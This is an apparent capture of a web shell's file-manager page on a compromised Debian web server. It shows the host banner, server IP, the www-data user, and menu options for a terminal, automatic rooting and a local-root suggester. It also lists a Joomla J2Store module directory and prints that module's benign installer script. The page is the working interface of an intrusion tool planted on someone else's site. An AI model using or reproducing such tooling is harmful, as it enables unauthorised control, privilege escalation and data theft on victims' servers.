Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
modules /
mod_j2store_detailcart /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
tmpl
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
helper.php
6.27
KB
-rwxr-xr-x
2018-11-08 09:08
index.html
46
B
-rwxr-xr-x
2018-11-08 09:08
mod_j2store_detailcart.php
3.33
KB
-rwxr-xr-x
2018-11-08 09:08
mod_j2store_detailcart.xml
9.87
KB
-rwxr-xr-x
2018-11-08 09:08
script.mod_j2store_detailcart.php
1.43
KB
-rwxr-xr-x
2018-11-08 09:08
Save
Rename
<?php /* ------------------------------------------------------------------------ # mod_j2store_detailcart - J2Store Detail cart # ------------------------------------------------------------------------ # author ThemeParrot - ThemeParrot http://www.ThemeParrot.com # copyright Copyright (C) 2014 ThemeParrot.com. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://ThemeParrot.com # Based on Latest Articles module of Joomla ------------------------------------------------------------------------- */ // no direct access defined('_JEXEC') or die('Restricted access'); class mod_j2store_detailcartInstallerScript { function preflight( $type, $parent ) { if(!JComponentHelper::isEnabled('com_j2store')) { Jerror::raiseWarning(null, 'J2Store not found. Please install J2Store before installing this plugin'); return false; } jimport('joomla.filesystem.file'); $version_file = JPATH_ADMINISTRATOR.'/components/com_j2store/version.php'; if (JFile::exists ( $version_file )) { require_once($version_file); if (version_compare ( J2STORE_VERSION, '3.1.7', 'lt' ) ) { Jerror::raiseWarning ( null, 'You need at least J2Store version 3.1.7 for this Module to work' ); return false; } } else { Jerror::raiseWarning ( null, 'J2Store not found or the version file is not found. Make sure that you have installed J2Store before installing this plugin' ); return false; } } }